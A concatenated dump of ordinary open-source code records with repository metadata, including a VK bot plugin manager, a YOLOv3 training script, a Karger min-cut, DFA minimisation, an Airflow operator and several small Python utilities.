1\n )\n p.name = name\n\n if len(getattr(p, 'keywords', ())) == 0:\n self.log(u'[b]Ошибка: Нет ключевых слов для модуля %s[/b]' % f, 1)\n return\n \n if getattr(p, '__doc__', None) is None:\n self.log(\n u'[b]Предупреждение: модуль %s не имеет документации[/b]' % f, 1\n )\n p.__doc__ = ''\n\n if not hasattr(p, 'protection'):\n self.log(\n u'[b]Предупреждение: модуль %s не имеет информации о защите. '\n u'Использую 0[/b]' % f, 1\n )\n p.protection = 0\n\n if not hasattr(p, 'argument_required'):\n self.log(\n u'[b]Предупреждение: модуль %s не имеет информации о '\n u'необходимости аргумента. Использую False[/b]' % f, 1\n )\n p.argument_required = False\n\n if not hasattr(p, 'priority'):\n p.priority = 0\n\n if not hasattr(p, '_accept_request'):\n p._accept_request = \\\n types.MethodType(default_plugin__accept_request, p)\n\n if p.name in self.plugins:\n self.log(\n u'Предупреждение: модуль [b]%s[/b] будет переназначен ...' %\n p.name, 1)\n\n if p.name in self.builtin_plugin_list:\n self.builtin_plugin_list.remove(p.name)\n\n if p.name in self.custom_plugin_list:\n self.custom_plugin_list.remove(p.name)\n\n self.plugins[name] = p\n\n def set_logging_function(self, logging_function):\n self.log = logging_function\n self.utils.log = logging_function\n self.log(u'Подключена функция логгирования для менеджера плагинов', 0)\n\n\nclass PluginUtils(object):\n \"\"\"This class contains all nesessary utils for plugins\n \"\"\"\n\n def __init__(self, pm, bot, vkr, log):\n self.__pm = pm\n self.__bot = bot\n self.vkr = vkr\n self.log = log\n\n def get_settings(self):\n return self.__bot.settings\n\n def get_blacklist(self):\n return self.__bot.blacklist\n\n def get_whitelist(self):\n return self.__bot.whitelist\n\n def get_custom_commands(self):\n return self.__bot.custom_commands\n\n def get_settings(self, keys, section='Plugins'):\n return utils.get_settings(keys, section=section)\n\n def save_setting(self, key, val, section='Plugins'):\n self.log(u'Обновляю настройки: %s=%s' % (key, val), 0)\n utils.save_setting(key, val, section=section)\n\n if key in self.__bot.settings:\n self.__bot.settings[key] = val\n\n self.__bot.is_settings_changed = True\n\n def save_blacklist(self, blacklist):\n utils.save_blacklist(blacklist)\n self.__bot.blacklist = blacklist\n\n def save_whitelist(self, whitelist):\n utils.save_whitelist(whitelist)\n self.__bot.whitelist = whitelist\n\n def save_custom_commands(self, custom_commands):\n utils.save_custom_commands(custom_commands)\n self.__bot.custom_commands = custom_commands\n\n def clear_message_queue(self):\n self.__bot.mlpd = None\n\n def get_user_access_level(self, msg):\n whitelist = self.get_whitelist()\n\n if msg.out:\n user_access_level = 4\n elif msg.real_user_id in whitelist:\n user_access_level = whitelist[msg.real_user_id]\n else:\n user_access_level = 0\n\n return user_access_level\n\n def safe_format(self, *args, **kwargs):\n return utils.safe_format(*args, **kwargs)\n\n def get_plugin_list(self):\n return self.__pm.plugin_list\n\n def get_builtin_plugin_list(self):\n return self.__pm.builtin_plugin_list\n\n def get_custom_plugin_list(self):\n return self.__pm.custom_plugin_list\n\n def get_plugin(self, name):\n return self.__pm.plugins[name] if name in self.__pm.plugin_list else None\n\n def stop_bot(self):\n self.log(u'Вызов функции остановки', 0)\n self.__bot.runtime_error = 0\n\n def set_startup_response(self, response):\n self.__bot.startup_response = response\n\n def restart_bot(self):\n self.log(u'Вызов функции перезагрузки', 0)\n self.__bot.runtime_error = 1","repo_name":"Fogapod/VKBot","sub_path":"bot/plugins/pluginmanager.py","file_name":"pluginmanager.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"77"} +{"seq_id":"38995874913","text":"import tensorflow as tf\nfrom core import utils, yolov3\nfrom core.dataset import dataset, Parser\nsess = tf.Session()\n\nIMAGE_H, IMAGE_W = 416, 416\nBATCH_SIZE = 8\nSTEPS = 2500\nLR = 0.001 # if Nan, set 0.0005, 0.0001\nDECAY_STEPS = 100\nDECAY_RATE = 0.9\nSHUFFLE_SIZE = 200\nCLASSES = utils.read_coco_names('./data/raccoon.names')\nANCHORS = utils.get_anchors('./data/raccoon_anchors.txt', IMAGE_H, IMAGE_W)\nNUM_CLASSES = len(CLASSES)\nEVAL_INTERNAL = 100\nSAVE_INTERNAL = 500\n\ntrain_tfrecord = \"./raccoon_dataset/raccoon_train.tfrecords\"\ntest_tfrecord = \"./raccoon_dataset/raccoon_test.tfrecords\"\n\nparser = Parser(IMAGE_H, IMAGE_W, ANCHORS, NUM_CLASSES)\ntrainset = dataset(parser, train_tfrecord, BATCH_SIZE, shuffle=SHUFFLE_SIZE)\ntestset = dataset(parser, test_tfrecord , BATCH_SIZE, shuffle=None)\n\nis_training = tf.placeholder(tf.bool)\nexample = tf.cond(is_training, lambda: trainset.get_next(), lambda: testset.get_next())\n\nimages, *y_true = example\nmodel = yolov3.yolov3(NUM_CLASSES, ANCHORS)\n\nwith tf.variable_scope('yolov3'):\n pred_feature_map = model.forward(images, is_training=is_training)\n loss = model.compute_loss(pred_feature_map, y_true)\n y_pred = model.predict(pred_feature_map)\n\ntf.summary.scalar(\"loss/coord_loss\", loss[1])\ntf.summary.scalar(\"loss/sizes_loss\", loss[2])\ntf.summary.scalar(\"loss/confs_loss\", loss[3])\ntf.summary.scalar(\"loss/class_loss\", loss[4])\n\nglobal_step = tf.Variable(0, trainable=False, collections=[tf.GraphKeys.LOCAL_VARIABLES])\nwrite_op = tf.summary.merge_all()\nwriter_train = tf.summary.FileWriter(\"./data/train\")\nwriter_test = tf.summary.FileWriter(\"./data/test\")\n\nsaver_to_restore = tf.train.Saver(var_list=tf.contrib.framework.get_variables_to_restore(include=[\"yolov3/darknet-53\"]))\nupdate_vars = tf.contrib.framework.get_variables_to_restore(include=[\"yolov3/yolo-v3\"])\nlearning_rate = tf.train.exponential_decay(LR, global_step, decay_steps=DECAY_STEPS, decay_rate=DECAY_RATE, staircase=True)\noptimizer = tf.train.AdamOptimizer(learning_rate)\n\n# set dependencies for BN ops\nupdate_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\nwith tf.control_dependencies(update_ops):\n train_op = optimizer.minimize(loss[0], var_list=update_vars, global_step=global_step)\n\nsess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])\nsaver_to_restore.restore(sess, \"./checkpoint/yolov3.ckpt\")\nsaver = tf.train.Saver(max_to_keep=2)\n\nfor step in range(STEPS):\n run_items = sess.run([train_op, write_op, y_pred, y_true] + loss, feed_dict={is_training:True})\n\n if (step+1) % EVAL_INTERNAL == 0:\n train_rec_value, train_prec_value = utils.evaluate(run_items[2], run_items[3])\n\n writer_train.add_summary(run_items[1], global_step=step)\n writer_train.flush() # Flushes the event file to disk\n if (step+1) % SAVE_INTERNAL == 0: saver.save(sess, save_path=\"./checkpoint/yolov3.ckpt\", global_step=step+1)\n\n print(\"=> STEP %10d [TRAIN]:\\tloss_xy:%7.4f \\tloss_wh:%7.4f \\tloss_conf:%7.4f \\tloss_class:%7.4f\"\n %(step+1, run_items[5], run_items[6], run_items[7], run_items[8]))\n\n run_items = sess.run([write_op, y_pred, y_true] + loss, feed_dict={is_training:False})\n if (step+1) % EVAL_INTERNAL == 0:\n test_rec_value, test_prec_value = utils.evaluate(run_items[1], run_items[2])\n print(\"\\n=======================> evaluation result <================================\\n\")\n print(\"=> STEP %10d [TRAIN]:\\trecall:%7.4f \\tprecision:%7.4f\" %(step+1, train_rec_value, train_prec_value))\n print(\"=> STEP %10d [VALID]:\\trecall:%7.4f \\tprecision:%7.4f\" %(step+1, test_rec_value, test_prec_value))\n print(\"\\n=======================> evaluation result <================================\\n\")\n\n writer_test.add_summary(run_items[0], global_step=step)\n writer_test.flush() # Flushes the event file to disk\n\n","repo_name":"HulkMaker/tensorflow-slim-yolov3","sub_path":"quick_train.py","file_name":"quick_train.py","file_ext":"py","file_size_in_byte":3927,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"77"} +{"seq_id":"36634840349","text":"from tkinter import *\nimport pyshorteners\nimport pyperclip\n\n\nroot = Tk()\nroot.title('ShortLink')\nroot.configure(bg='#BABCA8')\nw = 200\nh = 200\nx = root.winfo_screenwidth()\ny = root.winfo_screenheight()\nx = (x//2) - (w//2)\ny = (y//2) - (h//2)\nroot.geometry(f'{w}x{h}+{x}+{y}')\n\nlink = StringVar()\nsortUrl = StringVar()\n\n\ndef short_link():\n sort_url = link.get()\n generate_short_link = pyshorteners.Shortener().tinyurl.short(sort_url)\n sortUrl.set(generate_short_link)\n\n\ndef copy():\n generate_short_link = sortUrl.get()\n pyperclip.copy(generate_short_link)\n\n\nLabel(root, text='Generate your short link').pack(pady=10)\nEntry(root, textvariable=link).pack(pady=5)\nButton(root, text='generate', command=short_link).pack(pady=5)\nEntry(root, textvariable=sortUrl).pack(pady=5)\nButton(root, text='copy', command=copy).pack(pady=5)\nroot.mainloop()\n","repo_name":"Emmuui/Link-shortener","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72635621688","text":"import functional_words as fw\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ntempest = fw.tempest\nmuch_ado = fw.much_ado\nmacbeth = fw.macbeth\nhenryvi = fw.henryvi\nfaustus = fw.faustus\n\ntemp_macbeth = fw.temp_macbeth\ntemp_much_ado = fw.temp_much_ado\ntemp_henryvi = fw.temp_henryvi\ntemp_faustus = fw.temp_faustus\n\ndef drawmap(play):\n\n\tdata = [play[key] for key in play]\n\tindex = [key for key in play]\n\tdf = pd.DataFrame(data=data)\n\n\tsns.set(context=\"paper\", font=\"monospace\", font_scale=.5)\n\n\t# Set up the matplotlib figure\n\tf, ax = plt.subplots(figsize=(12, 9))\n\n\t# Draw the heatmap using seaborn\n\theatmap = sns.heatmap(df, vmax=25, square=True, yticklabels=index)\n#\theatmap = sns.heatmap(df, vmax=df.max().max(), square=True, yticklabels=index, cmap=\"RdBu_r\")\n\n\t# f.tight_layout()\n\tplt.xticks(rotation=-90)\n\tplt.yticks(rotation=0)\n\n\tfig = heatmap.get_figure()\n\tfig.savefig(\"plot.png\", dpi=300)\n\n\tsns.plt.show()\n\n#drawmap(faustus)\ndrawmap(tempest)\n","repo_name":"crispin-cas9/functional-words","sub_path":"heatmap.py","file_name":"heatmap.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9638723896","text":"\"\"\"\nWe are going to implement the random contraction algorithm for graphs. Let's do some brainstorming for it.\n\nInput: an adjacency list representing a graph.\nOutput: The minimum cut for the graph, i.e. two sets A and B, each containing a unique group of nodes\n\nBasic idea: with no. of nodes = n, run n-2 iterations and on every iteration, pick an edge at random.\n Then, take the nodes corresponding to that edge and merge them into a supernode. Delete\n any self-loops, if any. Continue this process until you are left with two supernodes,\n which should be the case if you run n-2 iterations. Output the number of edges between these\n two supernodes. Once we have this basic algorithm, we just need to run it a large number\n of times to get the actual min-cut.\n\"\"\"\nimport random\nimport copy\n\ndef load_graph():\n graph = {}\n with open(\"kargerMinCut.txt\", 'r') as f:\n for line in f.readlines():\n row = line.split(\"\\t\")[:-1]\n graph[row[0]] = row[1:]\n return graph\n\ndef get_edge_list(graph):\n edge_list = []\n new_graph = copy.deepcopy(graph)\n for i, node in enumerate(new_graph.keys()):\n adjacent_node_list = new_graph[node]\n while len(adjacent_node_list) > 0:\n current_adjacent_node = adjacent_node_list[0]\n new_edge = (node, current_adjacent_node)\n # print(new_edge)\n edge_list.append(new_edge)\n new_graph[node].pop(0)\n new_graph[current_adjacent_node].pop(new_graph[current_adjacent_node].index(node))\n\n return edge_list\n\ndef filter_node_list(node_list, reference_node, new_node):\n for i, node in enumerate(node_list):\n if node == reference_node:\n node_list[i] = new_node\n \n return node_list\n\n\ndef min_cut(orig_graph):\n graph = copy.deepcopy(orig_graph)\n n = len(graph) #length of graph\n\n while(len(graph.keys()) > 2):\n edge_list = get_edge_list(graph)\n u, v = random.choice(edge_list)\n graph[u] = [node for node in graph[u] if node != v]\n graph[v] = [node for node in graph[v] if node != u]\n new_node = u + \"_\" + v\n for adjacent_node in graph[u]:\n graph[adjacent_node] = filter_node_list(graph[adjacent_node], u, new_node)\n\n for adjacent_node in graph[v]:\n graph[adjacent_node] = filter_node_list(graph[adjacent_node], v, new_node)\n\n graph[new_node] = graph[u] + graph[v]\n del graph[u]\n del graph[v]\n\n num_keys_remaining = len(graph.keys())\n num_edges = len(list(graph.values())[0])\n\n return num_edges\n\n\norig_graph = load_graph()\ntrials = []\n\nfor i in range(100):\n print(i)\n trials.append(min_cut(orig_graph))\n\nprint(min(trials))","repo_name":"ishaqibrahimbot/algorithms-python","sub_path":"random_contraction.py","file_name":"random_contraction.py","file_ext":"py","file_size_in_byte":2756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5142324398","text":"class DFA:\r\n def __init__(self, stari, alfabet, tranzitii, stare_start, stari_de_iesire):\r\n self.stari = stari\r\n self.alfabet = alfabet\r\n self.tranzitii = tranzitii\r\n self.stare_start = stare_start\r\n self.stari_de_iesire = stari_de_iesire\r\n\r\ndef min_dfa(dfa):\r\n def partitii(P, T):\r\n r= []\r\n for p in P:\r\n split = {}\r\n for stare in p:\r\n key = tuple(T[stare][char] in p for char in dfa.alfabet)\r\n if key not in split:\r\n split[key] = []\r\n split[key].append(stare)\r\n r.extend(split.values())\r\n return r\r\n\r\n P = [set(dfa.stari_de_iesire), dfa.stari - set(dfa.stari_de_iesire)]\r\n T = {stare: {char: dfa.tranzitii[stare][char] for char in dfa.alfabet} for stare in dfa.stari}\r\n while True:\r\n new_P = partitii(P, T)\r\n if len(new_P) == len(P):\r\n break\r\n P = new_P\r\n\r\n stare_m = {stare: i for i, partition in enumerate(P) for stare in partition}\r\n new_stari = set(stare_m.values())\r\n new_alfabet = dfa.alfabet\r\n new_tranzitii = {stare: {char: stare_m[T[stare][char]] for char in new_alfabet} for stare in new_stari}\r\n new_stare_start = stare_m[dfa.stare_start]\r\n new_stari_de_iesire = {stare_m[stare] for stare in dfa.stari_de_iesire}\r\n\r\n return DFA(new_stari, new_alfabet, new_tranzitii, new_stare_start, new_stari_de_iesire)\r\n\r\ndef print_dfa(dfa):\r\n print(f\"States: {dfa.stari}\")\r\n print(f\"Alphabet: {dfa.alfabet}\")\r\n print(f\"Transition function:\")\r\n for stare in dfa.stari:\r\n for char in dfa.alfabet:\r\n print(f\" {stare} --{char}--> {dfa.tranzitii[stare][char]}\")\r\n print(f\"Start state: {dfa.stare_start}\")\r\n print(f\"Accept states: {dfa.stari_de_iesire}\")\r\n\r\n# Exemplu de automat finit determinist (DFA):\r\nstari = {0, 1, 2, 3}\r\nalfabet = {'a', 'b'}\r\ntranzitii = {\r\n 0: {'a': 1, 'b': 0},\r\n 1: {'a': 2, 'b': 0},\r\n 2: {'a': 2, 'b': 3},\r\n 3: {'a': 2, 'b': 0},\r\n}\r\nstare_start = 0\r\nstari_de_iesire = {2, 3}\r\n\r\ndfa = DFA(stari, alfabet, tranzitii, stare_start, stari_de_iesire)\r\nprint(\"DFA initial:\")\r\nprint_dfa(dfa)\r\n\r\nmin_dfa = min_dfa(dfa)\r\nprint(\"\\nDFA minimal:\")\r\nprint_dfa(min_dfa)\r\n\r\n\r\n","repo_name":"AlexFlorin21/minimal_DFA","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2250,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"29478213713","text":"from airflow.hooks.http_hook import HttpHook\nfrom airflow.models import BaseOperator\nfrom airflow.hooks.postgres_hook import PostgresHook\nimport logging\nimport pandas as pd\n\n\nclass NVinogreevRAMHook(HttpHook):\n def __init__(self, http_conn_id: str, **kwargs) -> None:\n super().__init__(http_conn_id=http_conn_id, **kwargs)\n self.method = 'GET' # устанавливаем метод, с помощью которого будет проводиться запрос\n\n def get_count_of_pages(self):\n \"\"\"Returns count of pages in location\"\"\"\n return self.run(endpoint='api/location').json()['info']['pages']\n\n def get_result_of_locations(self, page_num: str) -> list:\n \"\"\"Returns descriptive data of location\"\"\"\n return self.run(endpoint=f'api/location/?page={page_num}').json()['results']\n\n\nclass NVinogreevRAMResidentsTopLocationsOperator(BaseOperator):\n \"\"\"\n Get top locations based on their count of residents\n \"\"\"\n\n def __init__(self, number_of_top: int, http_conn_id: str, postgres_conn_id: str, **kwargs) -> None:\n super().__init__(**kwargs)\n self.number_of_top = number_of_top\n self.http_conn_id = http_conn_id\n self.postgres_conn_id = postgres_conn_id\n\n def execute(self, context):\n http_hook = NVinogreevRAMHook(self.http_conn_id)\n postgres_hook = PostgresHook(self.postgres_conn_id)\n engine = postgres_hook.get_sqlalchemy_engine()\n\n # Получаем количество страниц\n result_count_of_pages = http_hook.get_count_of_pages()\n df = []\n for page in range(result_count_of_pages):\n # Стучимся в API и забираем результаты\n results = http_hook.get_result_of_locations(str(page + 1))\n for result in results:\n # Добавляем в количество резидентов в локации\n result['resident_cnt'] = len(result['residents'])\n df.append(result)\n\n df = pd.DataFrame.from_records(df)\n # Забираем только нужные столбцы\n df = df[['id', 'name', 'type', 'dimension', 'resident_cnt']]\n # Вычисляем топ локаций по резидентам\n df = df.nlargest(self.number_of_top, 'resident_cnt')\n\n logging.info(df.head())\n\n # Записываем данные в таблицу\n df.to_sql(\n con=engine,\n name='n_vinogreev_ram_location',\n schema='public',\n if_exists='replace',\n index=False\n )\n\n logging.info('Successfully inserted data to table')\n","repo_name":"skarfex/education.courses_data_engineer","sub_path":"karpov_airflow_fullrep/plugins/n_vinogreev/n_vinogreev_ram_top3_residents_count.py","file_name":"n_vinogreev_ram_top3_residents_count.py","file_ext":"py","file_size_in_byte":2715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24710777756","text":"#!/usr/bin/env python\n# encoding: utf-8\n\nimport logging\n\n\nasync def tcp_copy(_reader, _writer):\n while True:\n try:\n data = await _reader.read(4096)\n if not data:\n _writer.close()\n break\n _writer.write(data)\n await _writer.drain()\n except Exception as ex:\n logging.warning(str(ex))\n _writer.close()\n break\n","repo_name":"mutalisk999/tls-proxy-py","sub_path":"network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"5249865150","text":"# # Вычислить число c заданной точностью d\n# # Пример:\n# # - при d = 3, π = 3.141\n\nn = int(input('Введите число от 4000 до 40000: '))\nd = int(input('Введите точность округления: '))\nleibniz, madhava, basel, bbp = 0, 0, 0, 0\nc = 0\nfor i in range(1, n):\n if i % 2 != 0:\n leibniz += (-1)**c*4/i\n madhava += (-1)**c*1/(i*3**c)\n c += 1\n basel += 1/i**2\n if i<257:\n bbp += (4/(8*(i-1)+1)-2/(8*(i-1)+4)-1/(8*(i-1)+5)-1/(8*(i-1)+6))/16**(i-1)\nprint(f'π = {round(leibniz, d)}')\nprint(f'π = {round(madhava*12**0.5, d)}')\nprint(f'π = {round((basel*6)**0.5, d)}')\nprint(f'π = {round(bbp, d)}')\n","repo_name":"EvgenyVarlamov/Py_HomeWorkFolder_004","sub_path":"Hometask001.py","file_name":"Hometask001.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13202535534","text":"from flask import g\n\n\ndef menu_define_valid(objdbca, objtable, option):\n retBool = True\n msg = ''\n # 個別処理\n # ---------メニュー定義一覧---------\n entry_parameter = option.get('entry_parameter').get('parameter')\n current_parameter = option.get('current_parameter').get('parameter')\n\n # ---------メニュー名---------\n menu_name_ja = entry_parameter.get(\"menu_name_ja\")\n menu_name_en = entry_parameter.get(\"menu_name_en\")\n # メニュー名に「メインメニュー」、「Main menu」使用不可\n if menu_name_ja is not None and menu_name_en is not None:\n disabled_menu_name = g.appmsg.get_api_message(\"MSG-20001\", [])\n if menu_name_ja == disabled_menu_name or menu_name_en == disabled_menu_name:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20002\", [])\n \n # 更新時のみ。メニュー作成状態が2(作成済み)の場合、メニュー名(rest)が変更されていないことをチェック。\n menu_name_rest = entry_parameter.get('menu_name_rest')\n cmd_type = option.get(\"cmd_type\")\n if cmd_type == \"Update\":\n menu_create_done_status = entry_parameter.get(\"menu_create_done_status\")\n before_menu_name = current_parameter.get(\"menu_name_rest\")\n if menu_create_done_status == \"2\":\n if before_menu_name != menu_name_rest:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20004\", [])\n \n # 「メニュー管理」テーブルで使用されているmenu_name_restは使用不可(currentと同じ名前の場合はチェック処理をスキップ)\n menu_name_rest = entry_parameter.get('menu_name_rest')\n current_menu_name_rest = current_parameter.get('menu_name_rest')\n if not menu_name_rest == current_menu_name_rest:\n ret = objdbca.table_select('T_COMN_MENU', 'WHERE DISUSE_FLAG = %s', [0])\n menu_name_rest_list = []\n for recode in ret:\n menu_name_rest_list.append(recode.get('MENU_NAME_REST'))\n if menu_name_rest in (menu_name_rest_list):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20005\", [])\n\n if not retBool:\n return retBool, msg, option\n # ---------メニュー名---------\n\n # ---------作成対象---------\n # シートタイプ取得\n sheet_type = entry_parameter.get(\"sheet_type\")\n # 入力用メニューグループを取得\n menu_group_for_input = entry_parameter.get(\"menu_group_for_input\")\n # 代入値自動登録用メニューグループを取得\n menu_group_for_subst = entry_parameter.get(\"menu_group_for_subst\")\n # 参照用メニューグループを取得\n menu_group_for_ref = entry_parameter.get(\"menu_group_for_ref\")\n \n # 作成対象で「データシート」を選択\n if sheet_type == \"2\":\n # 代入値自動登録用メニューグループ、参照用メニューグループが選択されている場合、エラー\n if menu_group_for_subst or menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20006\", [])\n\n # ---------縦メニュー利用---------\n # 縦メニュー利用が設定されている場合、エラー\n vertical = entry_parameter.get(\"vertical\")\n if vertical == '1':\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20007\", [])\n # ---------縦メニュー利用---------\n\n # 作成対象で「パラメータシート(ホスト/オペレーションあり)」を選択\n elif sheet_type == \"1\":\n # 代入値自動登録用メニューグループ、または参照用メニューグループが設定されていない場合、エラー\n if not menu_group_for_subst or not menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20008\", [])\n # 作成対象で「パラメータシート(オペレーションあり)」を選択\n elif sheet_type == \"3\":\n if not menu_group_for_subst or not menu_group_for_ref:\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20009\", [])\n if not retBool:\n return retBool, msg, option\n # ---------作成対象---------\n\n # ---------代入値自動登録用メニューグループ---------\n # 作成対象が「パラメータシート(ホスト/オペレーションあり)」、「パラメータシート(オペレーションあり)」選択時のみ\n if sheet_type == \"1\" or sheet_type == \"3\":\n # 他のメニューグループと同じ場合、エラー\n if menu_group_for_subst and (menu_group_for_subst == menu_group_for_input or menu_group_for_subst == menu_group_for_ref):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20010\", [])\n # ---------代入値自動登録用メニューグループ---------\n\n # ---------参照用メニューグループ---------\n # 他のメニューグループと同じ場合、エラー\n if menu_group_for_ref and (menu_group_for_ref == menu_group_for_input or menu_group_for_ref == menu_group_for_subst):\n retBool = False\n msg = g.appmsg.get_api_message(\"MSG-20010\", [])\n if not retBool:\n return retBool, msg, option\n # ---------参照用メニューグループ---------\n \n # ---------メニュー定義一覧---------\n # 新規なら未作成にする\n if cmd_type == \"Register\":\n entry_parameter.update([('menu_create_done_status', '1')])\n # 個別処理\n return retBool, msg, option\n","repo_name":"shiota-2021/it-automation2-test","sub_path":"ita_root/common_libs/validate/valid_50102.py","file_name":"valid_50102.py","file_ext":"py","file_size_in_byte":5616,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7333103370","text":"#-----------------------------------------------------------------------------------------------------------------------------------#\n# 1. Dado um endereço IP válido (IPv4), retorne uma versão 'desativada' desse endereço IP.\n\n# Um endereço IP desativado substitui cada ponto \".\" com \"[.]\".\n\n# Exemplo 1:\n\n# Entrada: endereço = \"1.1.1.1\"\n# Saída: \"1[.]1[.]1[.]1\"\n# Exemplo 2:\n\n# Entrada: endereço = \"255.100.50.0\"\n# Saída: \"255[.]100[.]50[.]0\"\n\nip = \"255.100.50.0\"\n\nlista = ip.split('.')\nsaida = '[.]'.join(lista)\n\nprint(saida)\n\n#-----------------------------------------------------------------------------------------------------------------------------------#\n# 2. Um pangrama é uma frase em que cada letra do alfabeto aparece pelo menos uma vez.\n\n# Dada uma frase de string contendo apenas letras minúsculas, retorne true se a frase for um pangrama ou false caso contrário.\n\n# Exemplo 1:\n\n# Entrada: frase = \"thequickbrownfoxjumpsoverthelazydog\"\n# Saída: verdadeiro\n# Explicação: a frase contém pelo menos uma de cada letra do alfabeto.\n\n# Exemplo 2:\n\n# Entrada: frase = \"letscode\"\n# Saída: falso\n\nfrase = \"thequickbrownfoxjumpsoverthelazydog\"\n\nprimeiro = ord('a')\nultimo = ord('z') + 1\n\ncontador = 0\n\nfor alfabeto in range(primeiro, ultimo):\n if (chr(alfabeto) in frase):\n contador += 1\n\nif (contador == (ultimo-primeiro)):\n print(True)\nelse:\n print(False)\n","repo_name":"ValterNiloJr/Python-Data-Science","sub_path":"Aulas/1. Lógica de Programação I/Aula_9.py","file_name":"Aula_9.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70817152248","text":"from time import sleep, time\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\n\n#urlを取得する\nurl = \"\"\nr = requests.get(url,timeout = 3)\nr.raise_for_status()\nsoup = BeautifulSoup(r.content,\"xlml\")\n\n#会社情報を取得する\ncompanies = soup.find_all(\"div\",class_ = \"\")\n\nd_list = []\nfor company in companies:\n #企業名を取得\n company_name = company.find(\"span\",class_ = \"company\").text\n #URLを取得\n page_url = company.find(\"a\",class_ = \"\").get(\"href\")\n #必要なURLにタブを変更する\n page_url = page_url.replace(\"-tab_pr\",\"-tab_id\")\n\n sleep(3)\n\n page_r = requests.get(page_url,timeout = 3)\n page_r.raise_for_status()\n\n page_soup = BeautifulSoup(page_r.content,\"lxml\")\n\n table = page_soup.find(\"table\",id = \"company_prifile_table\")\n company_url = table.find(\"a\").get(\"href\")\n\n d_list.append({\n \"company_name\":company_name,\n \"company_url\":company_url\n })\n\n\ndf = pd.DataFrame(d_list)\ndf.to_csv(\"company.csv\",index=None,encoding=\"utf-8-sig\")","repo_name":"kojimakentaro/Python-Scraping","sub_path":"scr1.py","file_name":"scr1.py","file_ext":"py","file_size_in_byte":1033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"44924704852","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework import status\nfrom django.http import Http404\n\n\nclass MixinViewSet(APIView):\n serializer_class = None\n model = None\n\n def get(self, request, pk=None, format=None):\n return Response(self.get_serialiser_data_by_pk(pk))\n\n def post(self, request, pk=None, format=None):\n if pk:\n snippet = self.get_object(pk)\n serializer = self.serializer_class(snippet, data=request.data)\n else:\n serializer = self.serializer_class(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def get_object(self, pk):\n try:\n return self.model.objects.get(pk=pk)\n except self.model.DoesNotExist:\n raise Http404\n\n def get_serialiser_data_by_pk(self, pk=None, queryset=None):\n if queryset:\n if pk:\n aim = self.get_object(pk)\n if aim in queryset:\n serializer = self.serializer_class(aim)\n else:\n serializer = self.serializer_class(None, many=True)\n else:\n serializer = self.serializer_class(queryset, many=True)\n return serializer.data\n else:\n all = self.model.objects.all()\n if all:\n return self.get_serialiser_data_by_pk(pk, all)\n else:\n return self.serializer_class(None, many=True).data\n","repo_name":"power-ops/cmdb","sub_path":"cmdb/management/mixins/reset_framework.py","file_name":"reset_framework.py","file_ext":"py","file_size_in_byte":1670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"73097373367","text":"# GENERIC LIBRARIES\nfrom copy import deepcopy\nimport math\nimport time\n# SPECIAL LIBRARIES\n# import scipy as sp\n# import george\n# import autograd as ag\n# from autograd import value_and_grad\n# reverse mode is more efficiet for scalar valued functions\n# import autograd.numpy as np\nimport numpy as np\n# import numpy.random as npr\n# from autograd.numpy.linalg import solve\n# from numpy.linalg import solve\n# import mpmath as mp\n\nfrom scipy.stats import multivariate_normal as mvn\n\n# import igraph\n# UTILITY LIBRARIES\n\nfrom .eth_Tdex import eth_Tdex\nfrom .distnav_gp_computation import distnav_gp_computation\nfrom .distnav_rename import rename\n\nfrom .distnav_importance_scores import importance_scores\nfrom .distnav_compute import vigp_compute\nfrom .distnav_interact import interact\nfrom .distnav_generate_sample import generate_sample\n\n\ndef nav(a, h, score_thred, num_samples, cov_scale, obj_thred, \n max_iter, include_pdf_weight, coll_weight, Tdex_max, frame,\n num_peds, max_vel_robot, max_vel_ped, p2w_x, p2w_y,\n robot_start_x, robot_start_y, robot_goal_x, robot_goal_y,\n vel_x, vel_y, cmd_x, cmd_y,\n x, y, x_obs, y_obs, x_obs_un, y_obs_un,\n err_magnitude_ped, err_magnitude_robot, end_point_err_ped,\n 